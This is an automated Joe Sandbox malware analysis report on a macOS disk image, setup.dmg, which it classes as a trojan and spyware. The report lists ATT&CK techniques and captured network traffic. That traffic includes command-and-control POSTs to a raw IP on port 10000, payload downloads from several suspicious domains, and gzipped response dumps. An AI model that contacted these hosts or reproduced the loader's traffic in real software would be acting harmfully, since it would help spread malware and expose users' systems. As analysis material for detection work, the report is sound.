Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report setup.dmg

Overview

General Information

Joe Sandbox Version:25.0.0
Analysis ID:69635
Start date:14.02.2019
Start time:12:58:05
Joe Sandbox Product:Cloud
Overall analysis duration:0h 14m 3s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:setup.dmg
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal88.troj.spyw.evad.macDMG@0/49@46/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold880 - 100Report FP / FNfalsemalicious

Classification

Analysis Advice

Spawned process ReportCrash suggests that sample has crashed or is trying avoid analysis, try to read the dropped .crash file



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsScripting11Hidden Files and Directories11Launch Daemon2Hidden Files and Directories11Credential DumpingFile and Directory Discovery1Application Deployment SoftwareData from Local SystemData Encrypted1Uncommonly Used Port2
Replication Through Removable MediaService ExecutionBrowser Extensions1Accessibility FeaturesDisabling Security Tools1Network SniffingSystem Information Discovery151Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Non-Application Layer Protocol5
Drive-by CompromiseWindows Management InstrumentationLaunch Daemon2Path InterceptionScripting11Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol15
Exploit Public-Facing ApplicationScheduled TaskLaunch Agent3DLL Search Order HijackingObfuscated Files or InformationCredentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedMultiband Communication

Signature Overview

Click to jump to signature section


Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.50:49283 -> 34.225.153.59:10000
Found C&C like URL patternShow sources
Source: global trafficHTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 100Expect: 100-continueHost: 34.225.153.59:10000
Source: global trafficHTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 100Expect: 100-continueHost: 34.225.153.59:10000
Source: global trafficHTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 100Expect: 100-continueHost: 34.225.153.59:10000
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Source: unknownTCP traffic detected without corresponding DNS query: 34.225.153.59
Connects to many different domainsShow sources
Source: unknownNetwork traffic detected: DNS query count 39
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: POST /loadPE/getOffers.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 809Expect: 100-continueConnection: keep-aliveHost: 34.225.153.59:10000
Source: global trafficHTTP traffic detected: GET /download/mcwnet HTTP/1.1Connection: keep-aliveHost: install.osxappdownload.com
Source: global trafficHTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 100Expect: 100-continueHost: 34.225.153.59:10000
Source: global trafficHTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 100Expect: 100-continueHost: 34.225.153.59:10000
Source: global trafficHTTP traffic detected: GET /erq/chs?cid=3gggkfl1b0pp5pt5sadh&f=setup HTTP/1.1Connection: keep-aliveHost: www.pintaj.pw
Source: global trafficHTTP traffic detected: GET /cf/oq?cid=3gggkfl1b0pp5pt5sadh&f=setup&uu=lIaJhrzOpHZ6hXV2eXqMfXp6gXc= HTTP/1.1Connection: keep-aliveHost: tusak.rached.space
Source: global trafficHTTP traffic detected: GET /mmecw/qqvdwx?cid=3gggkfl1b0pp5pt5sadh&f=setup&pvhid=36264242-8135-4590-9915-e3e977081c0c HTTP/1.1Connection: keep-aliveHost: www.rached.space
Source: global trafficHTTP traffic detected: GET /download/downloaddm?com=df68d247-e9f2-42fa-b681-f63a4bb6ab50&=&f=setup&cifd=3gggkfl1b0pp5pt5sadh&sidw=df68d247-e9f2-42fa-b681-f63a4bb6ab50 HTTP/1.1Connection: keep-aliveHost: www.oplurb.space
Source: global trafficHTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 100Expect: 100-continueHost: 34.225.153.59:10000
Downloads compressed data via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: private, max-age=0Content-Type: text/xml; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Thu, 14 Feb 2019 11:59:48 GMTContent-Length: 263Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff 1e ef 16 65 7a 99 d7 4d 51 2d 3f fb 68 77 bc f3 51 9a 2f a7 d5 ac 58 5e 7c f6 d1 ba 3d df 3e f8 e8 f7 38 fa 8d 93 c7 4d 5b d3 47 29 b5 5e 36 9f 7d 34 6f db d5 a3 bb 77 db 7c b1 c2 ff d7 75 31 ae ea 8b bb 1f 1d ed 1e dc 1f ef 1e 3c 1c ef de df 19 3f d8 1b 9d 7c 7b f4 fa aa 68 7f 90 d7 65 b6 9c 8d e8 d9 7f 30 de dd df 3f 78 f8 60 ff d3 9d 87 f7 1e dc 1f 1d 50 db fb bb 3b f7 ef 3f dc 39 d8 db b9 b7 3b da a1
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: private, max-age=0Content-Type: text/xml; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Thu, 14 Feb 2019 12:00:11 GMTContent-Length: 263Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff 1e ef 16 65 7a 99 d7 4d 51 2d 3f fb 68 77 bc f3 51 9a 2f a7 d5 ac 58 5e 7c f6 d1 ba 3d df 3e f8 e8 f7 38 fa 8d 93 c7 4d 5b d3 47 29 b5 5e 36 9f 7d 34 6f db d5 a3 bb 77 db 7c b1 c2 ff d7 75 31 ae ea 8b bb 1f 1d ed 1e dc 1f ef 1e 3c 1c ef de df 19 3f d8 1b 9d 7c 7b f4 fa aa 68 7f 90 d7 65 b6 9c 8d e8 d9 7f 30 de dd df 3f 78 f8 60 ff d3 9d 87 f7 1e dc 1f 1d 50 db fb bb 3b f7 ef 3f dc 39 d8 db b9 b7 3b da a1
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: max-age=259200Content-Type: application/javascriptContent-Encoding: gzipLast-Modified: Tue, 29 Jan 2019 13:21:57 GMTAccept-Ranges: bytesETag: "80c8c69bd5b7d41:0"Vary: Accept-EncodingRequest-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bbDate: Thu, 14 Feb 2019 12:00:13 GMTContent-Length: 1314Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ac 57 ef 4e e3 46 10 ff 8e c4 3b 18 ab 0a b6 e2 73 e0 e8 a9 12 ee ea 14 41 ae 45 ba 83 13 a0 aa 15 47 23 63 4f 9c e5 1c 3b da dd 10 50 92 27 eb 87 3e 52 5f a1 b3 b3 6b c7 f9 03 dc 07 3e 40 b2 b3 f3 7f 7e 33 3b d9 dd f9 ef 9f 7f 77 77 f8 c0 73 d3 32 99 8c a0 50 2e 2f 1c 09 f9 c0 9f 21 75 cf 73 93 3c 96 f2 33 97 74 51 31 85 89 80 58 41 2f 07 7d f2 dc be eb fb f3 f9 f6 db f3 ab 56 eb c7 f4 9c 5f 79 ee 50 a9 f1 71 a7 33 9d 4e c3 e9 51 58 8a ac f3 fe e0 e0 a0 23 1f 32 37 70 33 34 e3 cf bc c1 a4 48 14 2f 0b ef 81 c3 d4 9f b9 13 09 8e 54 82 27 ca 8d c8 e9 7d ab 70 1f 4d 11 8f 2f 40 4d 44 11 3d c4 62 77 a7 f6 e4 ab 28 c7 ac e1 58
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: max-age=259200Content-Type: application/javascriptContent-Encoding: gzipLast-Modified: Tue, 29 Jan 2019 13:21:57 GMTAccept-Ranges: bytesETag: "80c8c69bd5b7d41:0"Vary: Accept-EncodingRequest-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bbDate: Thu, 14 Feb 2019 12:00:13 GMTContent-Length: 7593Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc 7d db 72 dc 46 92 e8 bb 22 fc 0f 4d 48 d1 00 d4 60 5f 64 cb b2 bb 55 62 48 94 3c e6 19 51 d2 88 f4 28 bc 24 87 81 6e 54 77 63 84 06 5a 00 9a 17 93 7c dd e7 8d fd 92 7d df 87 8d d8 4f d9 1f d8 5f d8 cc ac 0b 0a 97 e6 cd f6 78 e2 4c 84 a9 46 55 66 55 56 56 56 56 66 56 56 cd 57 0f fe f7 3f ff eb ab 07 d3 55 3c c9 c3 24 6e c5 fe 49 38 f3 73 be 9f fc 94 46 ce 2a 8d dc 8b 13 3f 6d 4d 59 90 4c 56 0b 1e e7 dd 49 ca a1 fe 4d c4 f1 cb b1 7e 78 ff 71 d7 72 47 d3 ae 4f 0d 30 40 19 69 d8 71 12 9c 77 fd e5 92 c7 c1 f6 3c 8c 02 67 8a 90 d9 6a bc 08 73 c7 1d 5d 7d f5 00 1b 0f f8 78 35 db 4d 02 ce a6 7e 94 f1 11 96 4d a2 70 f2 f9 78 92
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: max-age=259200Content-Type: application/javascriptContent-Encoding: gzipLast-Modified: Tue, 29 Jan 2019 13:21:57 GMTAccept-Ranges: bytesETag: "80c8c69bd5b7d41:0"Vary: Accept-EncodingRequest-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bbDate: Thu, 14 Feb 2019 12:00:13 GMTContent-Length: 2494Data Raw: 1f 8b 08 00 00 00 00 00 04 00 c4 59 6d 73 db b8 11 fe 9e 99 fc 07 85 d1 88 e4 99 a2 45 bf 24 b6 64 c8 93 fa 3a d3 4c af ed f5 92 4e 3f d8 ee 0d 4c 42 12 6c 8a e4 11 a0 5f 2a f9 bf 77 01 10 22 40 49 96 d3 5e a6 77 e3 88 c4 02 8b 7d 79 76 b1 0b be 7d 13 e7 19 e3 9d 4f 15 cf 2f f2 79 91 12 4e 50 46 1e 3a 93 2a 8b 39 cd 33 cf 5f c0 58 e7 57 3e a3 0c 89 7f 46 f2 b5 28 f3 7b 9a 90 12 39 d3 3c 9f a6 c4 d1 c3 e4 1e 39 ce 48 4e 0f 69 46 39 5a 31 ea 32 82 cb 78 f6 39 2b 2a 1e d4 2f 17 79 c6 31 cd 48 19 d4 ef 38 4d 6f 70 7c 17 68 fe fe e2 81 66 49 fe 10 4e d3 fc 06 a7 5f 78 5e 12 b4 3e b4 5c 2e 9e 47 8d 50 fa 61 b9 5c 8d 8d 94 9e dd 07 9a 4c 09 5f ed 8b ba 9e 73
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: max-age=259200Content-Type: application/javascriptContent-Encoding: gzipLast-Modified: Tue, 15 May 2018 11:51:18 GMTAccept-Ranges: bytesETag: "0ffe3843ecd31:0"Vary: Accept-EncodingRequest-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bbDate: Thu, 14 Feb 2019 12:00:13 GMTContent-Length: 14955Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec 7d 69 73 db 48 96 e0 e7 e9 88 fe 0f 10 a2 a7 0b 2c 93 34 a9 c3 2e 8b ed 72 cb b6 7c 74 4b 96 4a 52 79 aa 86 d6 28 00 10 14 21 53 24 9b 04 7d 94 47 bf 6c 3f ec 4f da bf b0 ef c8 1b 09 90 72 c9 bd d3 11 5b d3 63 11 79 e7 cb 97 ef ca 97 2f ff cf ff fa df f7 bf df f8 e3 1f be 0f fe 3a ce d3 6c b2 c8 82 e3 79 36 9e c6 83 bf 9d 62 ea db 7c 91 17 c1 a8 28 66 bb f7 ef a7 f3 2c 2e b2 ab 45 3b 9d 5e df 0f 86 d3 79 30 98 a6 cb eb 6c 52 c4 45 3e 9d 34 83 e5 6c 00 05 16 41 3c 19 04 d9 a7 f8 7a 36 ce 16 6d 68 06 5b 7a 36 9d 7d 9e e7 97 a3 22 88 d2 46 b0 d9 e9 76 5b f0 cf 4e 70 b9 78 9f 4f 26 d9 1c 1b 6d 06 f9 24 95 15 9e e7 8b 62 9e 2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: private, max-age=0, no-cachePragma: no-cacheContent-Type: text/javascript; charset=utf-8Content-Encoding: gzipExpires: Mon, 26 Jul 1997 05:00:00 GMTVary: Accept-EncodingServer: Microsoft-IIS/10.0Access-Control-Allow-Origin: *P3P: CP='CUR ADM OUR NOR STA NID'X-Powered-By: ASP.NETAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, AcceptAccess-Control-Allow-Methods: GET, POST, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 1000Date: Thu, 14 Feb 2019 12:00:14 GMTContent-Length: 1200Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 fe c7 bf f7 1f dc 3a 5f 2f a7 6d 51 2d b7 ee fc e2 df 38 b9 cc ea b4 49 3f 4b 3f 7a fc d1 27 1f cd 8
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /loadPE//ListOffers.php HTTP/1.1Host: 34.225.153.59:10000Upgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /loadPE//bootstrap/js/bootstrap.min.js HTTP/1.1Host: 34.225.153.59:10000Accept: */*Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE//ListOffers.phpAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /loadPE//bootstrap/css/bootstrap.min.css HTTP/1.1Host: 34.225.153.59:10000Accept: text/css,*/*;q=0.1Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE//ListOffers.phpAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /loadPE//JavaScript/jquery.min.js HTTP/1.1Host: 34.225.153.59:10000Accept: */*Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE//ListOffers.phpAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /loadPE//Image/sideboard.png HTTP/1.1Host: 34.225.153.59:10000Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE//ListOffers.phpAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /loadPE/LastPage.html HTTP/1.1Host: 34.225.153.59:10000Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Upgrade-Insecure-Requests: 1Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /loadPE/JavaScript/jquery.min.js HTTP/1.1Host: 34.225.153.59:10000Accept: */*Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE/LastPage.htmlAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /loadPE/CSS/MacStyle.css HTTP/1.1Host: 34.225.153.59:10000Accept: text/css,*/*;q=0.1Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE/LastPage.htmlAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /loadPE/Image/installing.gif HTTP/1.1Host: 34.225.153.59:10000Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE/LastPage.htmlAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /download/mcwnet HTTP/1.1Connection: keep-aliveHost: install.osxappdownload.com
Source: global trafficHTTP traffic detected: GET /loadPE/Image/loading.gif HTTP/1.1Host: 34.225.153.59:10000Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE/LastPage.htmlAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /loadPE/Image/clean.png HTTP/1.1Host: 34.225.153.59:10000Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Connection: keep-aliveCookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://34.225.153.59:10000/loadPE/LastPage.htmlAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /erq/chs?cid=3gggkfl1b0pp5pt5sadh&f=setup HTTP/1.1Connection: keep-aliveHost: www.pintaj.pw
Source: global trafficHTTP traffic detected: GET /cf/oq?cid=3gggkfl1b0pp5pt5sadh&f=setup&uu=lIaJhrzOpHZ6hXV2eXqMfXp6gXc= HTTP/1.1Connection: keep-aliveHost: tusak.rached.space
